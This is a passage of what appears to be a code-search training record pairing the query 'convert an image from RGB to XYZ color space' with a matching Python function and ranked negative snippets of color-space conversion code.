cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2LUV)\n elif color_space == 'HLS':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2HLS)\n elif color_space == 'YUV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2YUV)\n elif color_space == 'YCrCb':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2YCrCb)\n else:\n out_image = np.copy(image)\n return out_image", "def rgb_to_xyz(image: tf.Tensor) -> tf.Tensor:\n r, g, b = tf.unstack(image, axis=-1)\n var_r = r / 255\n var_g = g / 255\n var_b = b / 255\n\n var_r = tf.where(var_r > 0.04045, tf.pow((var_r + 0.055) / 1.055, 2.4),\n var_r / 12.92)\n var_g = tf.where(var_g > 0.04045, tf.pow((var_g + 0.055) / 1.055, 2.4),\n var_g / 12.92)\n var_b = tf.where(var_b > 0.04045, tf.pow((var_b + 0.055) / 1.055, 2.4),\n var_b / 12.92)\n var_r = var_r * 100\n var_g = var_g * 100\n var_b = var_b * 100\n\n x = var_r * 0.4124 + var_g * 0.3576 + var_b * 0.1805\n y = var_r * 0.2126 + var_g * 0.7152 + var_b * 0.0722\n z = var_r * 0.0193 + var_g * 0.1192 + var_b * 0.9505\n\n image_xyz = tf.stack([x, y, z], axis=-1)\n return image_xyz", "def example_rgb_to_xyz():\r\n\r\n print(\"=== RGB Example: RGB->XYZ ===\")\r\n # Instantiate an Lab color object with the given values.\r\n rgb = sRGBColor(120, 130, 140)\r\n # Show a string representation.\r\n print(rgb)\r\n # Convert RGB to XYZ using a D50 illuminant.\r\n xyz = convert_color(rgb, XYZColor, target_illuminant='D50')\r\n print(xyz)\r\n print(\"=== End Example ===\\n\")", "def ycbcr_to_rgb(image: torch.Tensor) -> torch.Tensor:\n y: torch.Tensor = image[..., 0, :, :]\n cb: torch.Tensor = image[..., 1, :, :]\n cr: torch.Tensor = image[..., 2, :, :]\n\n delta: float = 0.5\n cb_shifted: torch.Tensor = cb - delta\n cr_shifted: torch.Tensor = cr - delta\n\n r: torch.Tensor = y + 1.403 * cr_shifted\n g: torch.Tensor = y - 0.714 * cr_shifted - 0.344 * cb_shifted\n b: torch.Tensor = y + 1.773 * cb_shifted\n return torch.stack([r, g, b], -3)", "def XYZ_to_sRGB(XYZ):\n\n rgb = XYZ_to_sRGB_linear(XYZ)\n rgb = sRGB_linear_to_sRGB(rgb)\n\n return rgb", "def rgb(self, xyz: Union[ndarray, Iterable[float]]) -> ndarray:\n return self.value.xyz_to_rgb_matrix @ xyz", "def grey_to_rgb_imitation(img):\n return np.repeat(img[...,np.newaxis], 3, -1)", "def img_to_rgb(img):\r\n if len(img.shape) < 3 or img.shape[2] == 1:\r\n return np.repeat(img, 3).reshape(img.shape[0], img.shape[1], 3)\r\n else:\r\n return img", "def colorize_xyz(xyz):\n xyz_vis = xyz - xyz.min()\n return (255 * xyz_vis / xyz_vis.max()).astype(np.uint8)", "def grey_to_rgb(im):\n assert im.n_channels in [1, 3]\n\n if im.n_channels == 3:\n return im\n\n im.pixels = np.vstack([im.pixels] * 3)\n return im", "def matplotlib_image(image):\n if image.ndim == 2:\n rgb = cv2.cvtColor(image, cv2.COLOR_GRAY2RGB)\n else:\n rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n return rgb", "def _colored_img_to_arr(image, verbose=False):\n height, width = image.size\n arr = np.array(image.getdata())\n arr = arr.reshape(3, height, width)\n r = arr[0]\n g = arr[1]\n b = arr[2]\n return r, g, b", "def convert_color(image, color_space='RGB'):\n color_space = color_space.lower()\n if color_space != 'rgb':\n if color_space == 'hsv':\n color_transformation = cv2.COLOR_BGR2HSV\n elif color_space == 'luv':\n color_transformation = cv2.COLOR_BGR2LUV\n elif color_space == 'hls':\n color_transformation = cv2.COLOR_BGR2HLS\n elif color_space == 'yuv':\n color_transformation = cv2.COLOR_BGR2YUV\n elif color_space == 'ycrcb':\n color_transformation = cv2.COLOR_BGR2YCrCb\n else:\n raise ValueError('Invalid value %s for color_space parameters. Valid color spaces are: RGB, HSV, LUV, '\n 'HLS, YUV, YCrCb' % color_space)\n\n return cv2.cvtColor(image, color_transformation)\n else:\n return image", "def XYZ_to_RGB_matrix(self):\n\n if not self._use_derived_XYZ_to_RGB_matrix:\n return self._XYZ_to_RGB_matrix\n else:\n return self._derived_XYZ_to_RGB_matrix", "def red_channel(img):\n\n red = np.zeros(img.shape,dtype=float)\n\n red[:,:,2] = np.copy(img[:,:,2])\n\n return red", "def yuv_to_rgb(img_yuv):\n\n y = img_yuv[..., 0]\n u = img_yuv[..., 1]\n v = img_yuv[..., 2]\n\n r = y + 1.14 * v\n g = y - 0.396 * u - 0.581 * v\n b = y + 2.029 * u\n\n img_rgb = np.stack((r, g, b), axis=2)\n img_rgb = np.clip(img_rgb, 0, 1)\n return img_rgb", "def XYZ_to_RGB(cobj, target_rgb, *args, **kwargs):\r\n\r\n temp_X = cobj.xyz_x\r\n temp_Y = cobj.xyz_y\r\n temp_Z = cobj.xyz_z\r\n\r\n logger.debug(\" \\- Target RGB space: %s\", target_rgb)\r\n target_illum = target_rgb.native_illuminant\r\n logger.debug(\" \\- Target native illuminant: %s\", target_illum)\r\n logger.debug(\" \\- XYZ color's illuminant: %s\", cobj.illuminant)\r\n \r\n # If the XYZ values were taken with a different reference white than the\r\n # native reference white of the target RGB space, a transformation matrix\r\n # must be applied.\r\n if cobj.illuminant != target_illum:\r\n logger.debug(\" \\* Applying transformation from %s to %s \",\r\n cobj.illuminant, target_illum)\r\n # Get the adjusted XYZ values, adapted for the target illuminant.\r\n temp_X, temp_Y, temp_Z = apply_chromatic_adaptation(\r\n temp_X, temp_Y, temp_Z,\r\n orig_illum=cobj.illuminant, targ_illum=target_illum)\r\n logger.debug(\" \\* New values: %.3f, %.3f, %.3f\",\r\n temp_X, temp_Y, temp_Z)\r\n \r\n # Apply an RGB working space matrix to the XYZ values (matrix mul).\r\n rgb_r, rgb_g, rgb_b = apply_RGB_matrix(\r\n temp_X, temp_Y, temp_Z,\r\n rgb_type=target_rgb, convtype=\"xyz_to_rgb\")\r\n\r\n # v\r\n linear_channels = dict(r=rgb_r, g=rgb_g, b=rgb_b)\r\n # V\r\n nonlinear_channels = {}\r\n if target_rgb == sRGBColor:\r\n for channel in ['r', 'g', 'b']:\r\n v = linear_channels[channel]\r\n if v <= 0.0031308:\r\n nonlinear_channels[channel] = v * 12.92\r\n else:\r\n nonlinear_channels[channel] = 1.055 * math.pow(v, 1 / 2.4) - 0.055\r\n else:\r\n # If it's not sRGB...\r\n for channel in ['r', 'g', 'b']:\r\n v = linear_channels[channel]\r\n nonlinear_channels[channel] = math.pow(v, 1 / target_rgb.rgb_gamma)\r\n\r\n return target_rgb(\r\n nonlinear_channels['r'], nonlinear_channels['g'], nonlinear_channels['b'])", "def get_color(im_obj):\n #im = Image.open(path, 'r')\n x, y = im_obj.size\n\n r, g, b = 0, 0, 0\n for i in xrange(x):\n for j in xrange(y):\n color_px = im_obj.getpixel((i, j))\n #print color_px\n r += color_px[0]\n g += color_px[1]\n b += color_px[2]\n\n r = r / (x * y)\n g = g / (x * y)\n b = b / (x * y)\n return (r, g, b)", "def lab_to_rgb(img):\n new_img = np.zeros((256, 256, 3))\n for i in range(len(img)):\n for j in range(len(img[i])):\n pix = img[i, j]\n new_img[i, j] = [(pix[0] + 1) * 50, (pix[1] + 1) / 2 * 255 - 128, (pix[2] + 1) / 2 * 255 - 128]\n new_img = color.lab2rgb(new_img) * 255\n new_img = new_img.astype('uint8')\n return new_img", "def imcast(img, dtype, color_space=\"default\"):\n if img.dtype == dtype:\n return img\n if color_space == \"default\":\n if dtype == np.uint8:\n if img.dtype == np.uint16:\n return np.asarray(img / 257, np.uint8)\n elif img.dtype == np.float32 or img.dtype == np.float64:\n return np.asarray(img * 255., np.uint8)\n elif dtype == np.uint16:\n if img.dtype == np.uint8:\n return np.asarray(img, np.uint16) * 257\n elif img.dtype == np.float32 or img.dtype == np.float64:\n return np.asarray(img * 65535., np.uint16)\n elif dtype == np.float32 or dtype == np.float64:\n if img.dtype == np.uint8:\n return np.asarray(img, dtype) / 255.\n elif img.dtype == np.uint16:\n return np.asarray(img, dtype) / 65535.\n elif img.dtype == np.float32 or img.dtype == np.float64:\n return np.asarray(img, dtype)\n elif color_space == \"CIE-L*a*b*\":\n if dtype == np.uint8:\n if img.dtype == np.float32 or img.dtype == np.float64:\n dst = np.empty(img.shape, np.uint8)\n dst[:,:,0] = img[:,:,0] * 255. / 100.\n dst[:,:,1] = img[:,:,1] + 128.\n dst[:,:,2] = img[:,:,2] + 128.\n return dst\n elif dtype == np.float32 or dtype == np.float64:\n if img.dtype == np.uint8:\n dst = np.empty(img.shape, dtype)\n dst[:,:,0] = np.asarray(img[:,:,0], dtype) / 255. * 100.\n dst[:,:,1] = np.asarray(img[:,:,1], dtype) - 128.\n dst[:,:,2] = np.asarray(img[:,:,2], dtype) - 128.\n return dst\n raise Exception(\n \"Unexpected conversion from '%s' to '%s' with '%s' color space\" % \\\n (img.dtype, dtype, color_space))", "def yuv2rgb(im):\n ## conflicting definitions exist depending on whether you use the full range\n ## of YCbCr or clamp out to the valid range. see here\n ## http://www.equasys.de/colorconversion.html\n ## http://www.fourcc.org/fccyvrgb.php\n from numpy import dot, ndarray, array\n # if not im.dtype == 'uint8':\n # raise ImageUtilsError('yuv2rgb only implemented for uint8 arrays')\n\n ## better clip input to the valid range just to be on the safe side\n yuv = ndarray(im.shape) ## float64\n yuv[:, :, 0] = im[:, :, 0].clip(16, 235).astype(yuv.dtype) - 16\n yuv[:, :, 1:] = im[:, :, 1:].clip(16, 240).astype(yuv.dtype) - 128\n\n ## ITU-R BT.601 version (SDTV)\n A = array([[1., 0., 0.701],\n [1., -0.886 * 0.114 / 0.587, -0.701 * 0.299 / 0.587],\n [1., 0.886, 0.]])\n A[:, 0] *= 255. / 219.\n A[:, 1:] *= 255. / 112.\n\n ## ITU-R BT.709 version (HDTV)\n # A = array([[1.164, 0., 1.793],\n # [1.164, -0.213, -0.533],\n # [1.164, 2.112, 0.]])\n\n rgb = dot(yuv, A.T)\n return rgb.clip(0, 255).astype('uint8')", "def _process_img_rgb(self, sensor_data):\n img = np.array(sensor_data.raw_data).reshape((self.img_y, self.img_x, 4))\n img = img[:, :, :3] # sensor is actualy rgba, we dont need alpha values\n self.rgb = img # need to scale rgb values to be {0,1}", "def RGB_to_XYZ(RGB,\n illuminant_RGB,\n illuminant_XYZ,\n RGB_to_XYZ_matrix,\n chromatic_adaptation_transform='CAT02',\n decoding_cctf=None):\n\n if decoding_cctf is not None:\n RGB = decoding_cctf(RGB)\n\n M = chromatic_adaptation_matrix_VonKries(\n xyY_to_XYZ(xy_to_xyY(illuminant_RGB)),\n xyY_to_XYZ(xy_to_xyY(illuminant_XYZ)),\n transform=chromatic_adaptation_transform)\n\n XYZ = dot_vector(RGB_to_XYZ_matrix, RGB)\n\n XYZ_a = dot_vector(M, XYZ)\n\n return XYZ_a", "def rgb_to_xy(red, green, blue):\n\n # gamma correction\n red = pow((red + 0.055) / (1.0 + 0.055), 2.4) if red > 0.04045 else (red / 12.92)\n green = pow((green + 0.055) / (1.0 + 0.055), 2.4) if green > 0.04045 else (green / 12.92)\n blue = pow((blue + 0.055) / (1.0 + 0.055), 2.4) if blue > 0.04045 else (blue / 12.92)\n\n # convert rgb to xyz\n x = red * 0.649926 + green * 0.103455 + blue * 0.197109\n y = red * 0.234327 + green * 0.743075 + blue * 0.022598\n z = green * 0.053077 + blue * 1.035763\n\n # convert xyz to xy\n x = x / (x + y + z)\n y = y / (x + y + z)\n\n # TODO check color gamut if known\n \n return [x, y]", "def to_rgb(im):\n w, h = im.shape\n ret = np.empty((w, h, 3), dtype=np.uint8)\n ret[:, :, 2] = ret[:, :, 1] = ret[:, :, 0] = im\n return ret" ]
[ "0.6828028", "0.68103015", "0.68066865", "0.6763418", "0.66843706", "0.66742265", "0.66261303", "0.65840024", "0.6561155", "0.6552539", "0.64690375", "0.645088", "0.63681024", "0.6365761", "0.63621247", "0.6326144", "0.6306346", "0.6306079", "0.6283632", "0.6256421", "0.62433654", "0.62383455", "0.62226963", "0.6117911", "0.6095532", "0.6088051", "0.60821766", "0.60728455", "0.60607404", "0.6055855" ]
0.7146014
0
Convert an image from RGB color space to XYZ color space
def rgb_to_xyz(image: tf.Tensor) -> tf.Tensor: r, g, b = tf.unstack(image, axis=-1) var_r = r / 255 var_g = g / 255 var_b = b / 255 var_r = tf.where(var_r > 0.04045, tf.pow((var_r + 0.055) / 1.055, 2.4), var_r / 12.92) var_g = tf.where(var_g > 0.04045, tf.pow((var_g + 0.055) / 1.055, 2.4), var_g / 12.92) var_b = tf.where(var_b > 0.04045, tf.pow((var_b + 0.055) / 1.055, 2.4), var_b / 12.92) var_r = var_r * 100 var_g = var_g * 100 var_b = var_b * 100 x = var_r * 0.4124 + var_g * 0.3576 + var_b * 0.1805 y = var_r * 0.2126 + var_g * 0.7152 + var_b * 0.0722 z = var_r * 0.0193 + var_g * 0.1192 + var_b * 0.9505 image_xyz = tf.stack([x, y, z], axis=-1) return image_xyz
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def rgb_to_xyz(rgb_color):\n\n r = (rgb_color[0] / 255)\n g = (rgb_color[1] / 255)\n b = (rgb_color[2] / 255)\n\n if r > 0.04045:\n r = ((r + 0.055) / 1.055) ** 2.4\n else:\n r = r / 12.92\n\n if g > 0.04045:\n g = ((g + 0.055) / 1.055) ** 2.4\n else:\n g = g / 12.92\n\n if b > 0.04045:\n b = ((b + 0.055) / 1.055) ** 2.4\n else:\n b = b / 12.92\n\n r = r * 100\n g = g * 100\n b = b * 100\n x = (r * 0.4124) + (g * 0.3576) + (b * 0.1805)\n y = (r * 0.2126) + (g * 0.7152) + (b * 0.0722)\n z = (r * 0.0193) + (g * 0.1192) + (b * 0.9505)\n\n return x, y, z", "def xyz_to_rgb(image: tf.Tensor) -> tf.Tensor:\n x, y, z = tf.unstack(image, axis=-1)\n var_x = x / 100\n var_y = y / 100\n var_z = z / 100\n\n var_r = var_x * 3.2406 + var_y * -1.5372 + var_z * -0.4986\n var_g = var_x * -0.9689 + var_y * 1.8758 + var_z * 0.0415\n var_b = var_x * 0.0557 + var_y * -0.2040 + var_z * 1.0570\n\n var_r = tf.where(var_r > 0.0031308,\n 1.055 * tf.pow(var_r, (1 / 2.4)) - 0.055,\n 12.92 * var_r)\n var_g = tf.where(var_g > 0.0031308,\n 1.055 * tf.pow(var_g, (1 / 2.4)) - 0.055,\n 12.92 * var_g)\n var_b = tf.where(var_b > 0.0031308,\n 1.055 * tf.pow(var_b, (1 / 2.4)) - 0.055,\n 12.92 * var_b)\n r = var_r * 255\n g = var_g * 255\n b = var_b * 255\n rgb_image = tf.cast(tf.stack([r, g, b], axis=-1), tf.uint8)\n return rgb_image", "def example_rgb_to_xyz():\r\n\r\n print(\"=== RGB Example: RGB->XYZ ===\")\r\n # Instantiate an Lab color object with the given values.\r\n rgb = sRGBColor(120, 130, 140)\r\n # Show a string representation.\r\n print(rgb)\r\n # Convert RGB to XYZ using a D50 illuminant.\r\n xyz = convert_color(rgb, XYZColor, target_illuminant='D50')\r\n print(xyz)\r\n print(\"=== End Example ===\\n\")", "def RGB_to_XYZ(RGB,\n illuminant_RGB,\n illuminant_XYZ,\n RGB_to_XYZ_matrix,\n chromatic_adaptation_transform='CAT02',\n decoding_cctf=None):\n\n if decoding_cctf is not None:\n RGB = decoding_cctf(RGB)\n\n M = chromatic_adaptation_matrix_VonKries(\n xyY_to_XYZ(xy_to_xyY(illuminant_RGB)),\n xyY_to_XYZ(xy_to_xyY(illuminant_XYZ)),\n transform=chromatic_adaptation_transform)\n\n XYZ = dot_vector(RGB_to_XYZ_matrix, RGB)\n\n XYZ_a = dot_vector(M, XYZ)\n\n return XYZ_a", "def RGB_to_XYZ_matrix(self):\n\n if not self._use_derived_RGB_to_XYZ_matrix:\n return self._RGB_to_XYZ_matrix\n else:\n return self._derived_RGB_to_XYZ_matrix", "def lin_a98rgb_to_xyz(rgb: Vector) -> Vector:\n\n return alg.dot(RGB_TO_XYZ, rgb, dims=alg.D2_D1)", "def rgb_to_xy(red, green, blue):\n\n # gamma correction\n red = pow((red + 0.055) / (1.0 + 0.055), 2.4) if red > 0.04045 else (red / 12.92)\n green = pow((green + 0.055) / (1.0 + 0.055), 2.4) if green > 0.04045 else (green / 12.92)\n blue = pow((blue + 0.055) / (1.0 + 0.055), 2.4) if blue > 0.04045 else (blue / 12.92)\n\n # convert rgb to xyz\n x = red * 0.649926 + green * 0.103455 + blue * 0.197109\n y = red * 0.234327 + green * 0.743075 + blue * 0.022598\n z = green * 0.053077 + blue * 1.035763\n\n # convert xyz to xy\n x = x / (x + y + z)\n y = y / (x + y + z)\n\n # TODO check color gamut if known\n \n return [x, y]", "def lab_to_xyz(image: tf.Tensor) -> tf.Tensor:\n l, a, b = tf.unstack(image, axis=-1)\n\n var_y = (l + 16) / 116\n var_x = a / 500 + var_y\n var_z = var_y - b / 200\n var_x = tf.where(tf.pow(var_x, 3) > 0.008856, tf.pow(var_x, 3),\n (var_x - 16 / 116) / 7.787)\n var_y = tf.where(tf.pow(var_y, 3) > 0.008856, tf.pow(var_y, 3),\n (var_y - 16 / 116) / 7.787)\n var_z = tf.where(tf.pow(var_z, 3) > 0.008856, tf.pow(var_z, 3),\n (var_z - 16 / 116) / 7.787)\n\n refx = 95.047\n refy = 100.00\n ref_z = 108.883\n\n x = var_x * refx\n y = var_y * refy\n z = var_z * ref_z\n xyz_image = tf.stack([x, y, z], axis=-1)\n return xyz_image", "def rgb_image(self):\n z3 = self.z[:,:,newaxis]\n return z3 * self.c", "def RGB_to_XYZ_matrix(self, value):\n\n if value is not None:\n value = np.asarray(value)\n self._RGB_to_XYZ_matrix = value", "def Lab_to_XYZ(cobj, *args, **kwargs):\r\n\r\n illum = cobj.get_illuminant_xyz()\r\n xyz_y = (cobj.lab_l + 16.0) / 116.0\r\n xyz_x = cobj.lab_a / 500.0 + xyz_y\r\n xyz_z = xyz_y - cobj.lab_b / 200.0\r\n \r\n if math.pow(xyz_y, 3) > color_constants.CIE_E:\r\n xyz_y = math.pow(xyz_y, 3)\r\n else:\r\n xyz_y = (xyz_y - 16.0 / 116.0) / 7.787\r\n\r\n if math.pow(xyz_x, 3) > color_constants.CIE_E:\r\n xyz_x = math.pow(xyz_x, 3)\r\n else:\r\n xyz_x = (xyz_x - 16.0 / 116.0) / 7.787\r\n \r\n if math.pow(xyz_z, 3) > color_constants.CIE_E:\r\n xyz_z = math.pow(xyz_z, 3)\r\n else:\r\n xyz_z = (xyz_z - 16.0 / 116.0) / 7.787\r\n \r\n xyz_x = (illum[\"X\"] * xyz_x)\r\n xyz_y = (illum[\"Y\"] * xyz_y)\r\n xyz_z = (illum[\"Z\"] * xyz_z)\r\n \r\n return XYZColor(\r\n xyz_x, xyz_y, xyz_z, observer=cobj.observer, illuminant=cobj.illuminant)", "def RGB_to_XYZ(cobj, target_illuminant=None, *args, **kwargs):\r\n\r\n # Will contain linearized RGB channels (removed the gamma func).\r\n linear_channels = {}\r\n\r\n if isinstance(cobj, sRGBColor):\r\n for channel in ['r', 'g', 'b']:\r\n V = getattr(cobj, 'rgb_' + channel)\r\n if V <= 0.04045:\r\n linear_channels[channel] = V / 12.92\r\n else:\r\n linear_channels[channel] = math.pow((V + 0.055) / 1.055, 2.4)\r\n else:\r\n # If it's not sRGB...\r\n gamma = cobj.rgb_gamma\r\n\r\n for channel in ['r', 'g', 'b']:\r\n V = getattr(cobj, 'rgb_' + channel)\r\n linear_channels[channel] = math.pow(V, gamma)\r\n \r\n # Apply an RGB working space matrix to the XYZ values (matrix mul).\r\n xyz_x, xyz_y, xyz_z = apply_RGB_matrix(\r\n linear_channels['r'], linear_channels['g'], linear_channels['b'],\r\n rgb_type=cobj, convtype=\"rgb_to_xyz\")\r\n\r\n if target_illuminant is None:\r\n target_illuminant = cobj.native_illuminant\r\n \r\n # The illuminant of the original RGB object. This will always match\r\n # the RGB colorspace's native illuminant.\r\n illuminant = cobj.native_illuminant\r\n xyzcolor = XYZColor(xyz_x, xyz_y, xyz_z, illuminant=illuminant)\r\n # This will take care of any illuminant changes for us (if source\r\n # illuminant != target illuminant).\r\n xyzcolor.apply_adaptation(target_illuminant)\r\n\r\n return xyzcolor", "def test_srgb_conversion_to_xyz_d65(self):\r\n\r\n xyz = convert_color(self.color, XYZColor)\r\n self.assertColorMatch(xyz, XYZColor(0.294, 0.457, 0.103))", "def convert_color(image, color_space):\n out_image = None\n if color_space != 'RGB':\n if color_space == 'HSV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2HSV)\n elif color_space == 'LUV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2LUV)\n elif color_space == 'HLS':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2HLS)\n elif color_space == 'YUV':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2YUV)\n elif color_space == 'YCrCb':\n out_image = cv2.cvtColor(image.astype(np.float32), cv2.COLOR_RGB2YCrCb)\n else:\n out_image = np.copy(image)\n return out_image", "def linear_rgb2xyz(rgb):\n arr = _prepare_colorarray(rgb).copy()\n return _convert(xyz_from_rgb, arr)", "def test_srgb_conversion_to_xyz_d50(self):\r\n\r\n xyz = convert_color(self.color, XYZColor, target_illuminant='D50')\r\n self.assertColorMatch(xyz, XYZColor(0.313, 0.460, 0.082))", "def ycbcr_to_rgb(image: torch.Tensor) -> torch.Tensor:\n y: torch.Tensor = image[..., 0, :, :]\n cb: torch.Tensor = image[..., 1, :, :]\n cr: torch.Tensor = image[..., 2, :, :]\n\n delta: float = 0.5\n cb_shifted: torch.Tensor = cb - delta\n cr_shifted: torch.Tensor = cr - delta\n\n r: torch.Tensor = y + 1.403 * cr_shifted\n g: torch.Tensor = y - 0.714 * cr_shifted - 0.344 * cb_shifted\n b: torch.Tensor = y + 1.773 * cb_shifted\n return torch.stack([r, g, b], -3)", "def lab_to_rgb(image: tf.Tensor) -> tf.Tensor:\n xyz = lab_to_xyz(image)\n rgb_image = xyz_to_rgb(xyz)\n return rgb_image", "def rgb_processing(rgb_img, center, scale, rot=0):\n rgb_img = crop(rgb_img, center, scale, \n [constants.IMG_RES, constants.IMG_RES], rot=rot)\n # (3,224,224),float,[0,1]\n rgb_img = np.transpose(rgb_img.astype('float32'),(2,0,1))/255.0\n return rgb_img", "def colorize_xyz(xyz):\n xyz_vis = xyz - xyz.min()\n return (255 * xyz_vis / xyz_vis.max()).astype(np.uint8)", "def _convert_to_yolo_img(self, img):\n\n img = img / 255.0\n h, w, c = img.shape\n img = img.transpose(2, 0, 1)\n outimg = make_image(w, h, c)\n img = img.reshape((w*h*c))\n data = c_array(c_float, img)\n outimg.data = data\n rgbgr_image(outimg)\n return outimg", "def XYZ_to_RGB(cobj, target_rgb, *args, **kwargs):\r\n\r\n temp_X = cobj.xyz_x\r\n temp_Y = cobj.xyz_y\r\n temp_Z = cobj.xyz_z\r\n\r\n logger.debug(\" \\- Target RGB space: %s\", target_rgb)\r\n target_illum = target_rgb.native_illuminant\r\n logger.debug(\" \\- Target native illuminant: %s\", target_illum)\r\n logger.debug(\" \\- XYZ color's illuminant: %s\", cobj.illuminant)\r\n \r\n # If the XYZ values were taken with a different reference white than the\r\n # native reference white of the target RGB space, a transformation matrix\r\n # must be applied.\r\n if cobj.illuminant != target_illum:\r\n logger.debug(\" \\* Applying transformation from %s to %s \",\r\n cobj.illuminant, target_illum)\r\n # Get the adjusted XYZ values, adapted for the target illuminant.\r\n temp_X, temp_Y, temp_Z = apply_chromatic_adaptation(\r\n temp_X, temp_Y, temp_Z,\r\n orig_illum=cobj.illuminant, targ_illum=target_illum)\r\n logger.debug(\" \\* New values: %.3f, %.3f, %.3f\",\r\n temp_X, temp_Y, temp_Z)\r\n \r\n # Apply an RGB working space matrix to the XYZ values (matrix mul).\r\n rgb_r, rgb_g, rgb_b = apply_RGB_matrix(\r\n temp_X, temp_Y, temp_Z,\r\n rgb_type=target_rgb, convtype=\"xyz_to_rgb\")\r\n\r\n # v\r\n linear_channels = dict(r=rgb_r, g=rgb_g, b=rgb_b)\r\n # V\r\n nonlinear_channels = {}\r\n if target_rgb == sRGBColor:\r\n for channel in ['r', 'g', 'b']:\r\n v = linear_channels[channel]\r\n if v <= 0.0031308:\r\n nonlinear_channels[channel] = v * 12.92\r\n else:\r\n nonlinear_channels[channel] = 1.055 * math.pow(v, 1 / 2.4) - 0.055\r\n else:\r\n # If it's not sRGB...\r\n for channel in ['r', 'g', 'b']:\r\n v = linear_channels[channel]\r\n nonlinear_channels[channel] = math.pow(v, 1 / target_rgb.rgb_gamma)\r\n\r\n return target_rgb(\r\n nonlinear_channels['r'], nonlinear_channels['g'], nonlinear_channels['b'])", "def get_rgb(self, img, r, g, b):\r\n\r\n # Get specific bands of hyperspectral image\r\n red_channel = img[:, :, r]\r\n green_channel = img[:, :, g]\r\n blue_channel = img[:, :, b]\r\n\r\n img = np.stack((red_channel, green_channel, blue_channel), axis=2)\r\n img = img.astype('float32')\r\n return img", "def pos2im_coordinates(x, z):\n # x_lim = [-0.85, 0.86]\n # z_lim = [-1.22, 0.47]\n x_lim = [-0.365, 0.365]\n z_lim = [-0.95, -0.24]\n\n pix_x = int(127 * (x_lim[1] - x) / (x_lim[1] - x_lim[0]))\n pix_z = int(127 * (z_lim[1] - z) / (z_lim[1] - z_lim[0]))\n return pix_x, pix_z", "def XYZ_to_RGB(XYZ,\n illuminant_XYZ,\n illuminant_RGB,\n XYZ_to_RGB_matrix,\n chromatic_adaptation_transform='CAT02',\n encoding_cctf=None):\n\n M = chromatic_adaptation_matrix_VonKries(\n xyY_to_XYZ(xy_to_xyY(illuminant_XYZ)),\n xyY_to_XYZ(xy_to_xyY(illuminant_RGB)),\n transform=chromatic_adaptation_transform)\n\n XYZ_a = dot_vector(M, XYZ)\n\n RGB = dot_vector(XYZ_to_RGB_matrix, XYZ_a)\n\n if encoding_cctf is not None:\n RGB = encoding_cctf(RGB)\n\n return RGB", "def XYZ_to_RGB_matrix(self):\n\n if not self._use_derived_XYZ_to_RGB_matrix:\n return self._XYZ_to_RGB_matrix\n else:\n return self._derived_XYZ_to_RGB_matrix", "def test_adobe_conversion_to_xyz_d65(self):\r\n\r\n adobe = AdobeRGBColor(0.482, 0.784, 0.196)\r\n xyz = convert_color(adobe, XYZColor)\r\n self.assertColorMatch(xyz, XYZColor(0.230, 0.429, 0.074))", "def rgb_to_ycbcr(image: torch.Tensor) -> torch.Tensor:\n r: torch.Tensor = image[..., 0, :, :]\n g: torch.Tensor = image[..., 1, :, :]\n b: torch.Tensor = image[..., 2, :, :]\n\n delta: float = 0.5\n y: torch.Tensor = 0.299 * r + 0.587 * g + 0.114 * b\n cb: torch.Tensor = (b - y) * 0.564 + delta\n cr: torch.Tensor = (r - y) * 0.713 + delta\n return torch.stack([y, cb, cr], -3)", "def to_image(x):\n x = denorm(x.data.cpu())\n ndarr = x.mul(255).clamp(0, 255).byte().permute(1, 2, 0).cpu().numpy()\n im = ndarr\n return im", "def camera_to_pixel(self, X):\n raise NotImplementedError" ]
[ "0.6907906", "0.6867097", "0.68299574", "0.66412497", "0.66398394", "0.65136164", "0.6503859", "0.6343428", "0.6280779", "0.6266033", "0.62629265", "0.620036", "0.61658543", "0.6152105", "0.60904413", "0.6024829", "0.5986624", "0.59797454", "0.597226", "0.5968314", "0.59129363", "0.58743936", "0.58658713", "0.58486485", "0.5839945", "0.58384067", "0.58263016", "0.58202267", "0.5802494", "0.57842463" ]
0.7601516
0
Convert an image from RGB color space to LAB color space RGB > XYZ > LAB
def rgb_to_lab(image: tf.Tensor) -> tf.Tensor: xyz = rgb_to_xyz(image) lab_image = xyz_to_lab(xyz) return lab_image
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def lab_to_rgb(image: tf.Tensor) -> tf.Tensor:\n xyz = lab_to_xyz(image)\n rgb_image = xyz_to_rgb(xyz)\n return rgb_image", "def lab_to_rgb(img):\n new_img = np.zeros((256, 256, 3))\n for i in range(len(img)):\n for j in range(len(img[i])):\n pix = img[i, j]\n new_img[i, j] = [(pix[0] + 1) * 50, (pix[1] + 1) / 2 * 255 - 128, (pix[2] + 1) / 2 * 255 - 128]\n new_img = color.lab2rgb(new_img) * 255\n new_img = new_img.astype('uint8')\n return new_img", "def lab_to_rgb(img_l, img_ab):\n lab = np.empty([*img_l.shape[0:2], 3])\n lab[:, :, 0] = np.squeeze(((img_l + 1) * 50))\n lab[:, :, 1:] = img_ab * 127\n return color.lab2rgb(lab)", "def rgb_to_lab(img, l=False, ab=False):\n img = img / 255\n l_chan = color.rgb2lab(img)[:, :, 0]\n l_chan = l_chan / 50 - 1\n l_chan = l_chan[..., np.newaxis]\n\n ab_chan = color.rgb2lab(img)[:, :, 1:]\n ab_chan = (ab_chan + 128) / 255 * 2 - 1\n if l:\n return l_chan\n else:\n return ab_chan", "def rgb2lab(r, g, b):\n r, g, b = r / 255.0, g / 255.0, b / 255.0\n\n # http://www.brucelindbloom.com/index.html?Math.html\n # Inverse sRGB Companding\n r = r / 12.92 if r <= 0.04045 else ((r + 0.055) / 1.055) ** 2.4\n g = g / 12.92 if g <= 0.04045 else ((g + 0.055) / 1.055) ** 2.4\n b = b / 12.92 if b <= 0.04045 else ((b + 0.055) / 1.055) ** 2.4\n\n # http://www.brucelindbloom.com/index.html?Eqn_RGB_XYZ_Matrix.html\n # sRGB, D65\n x = 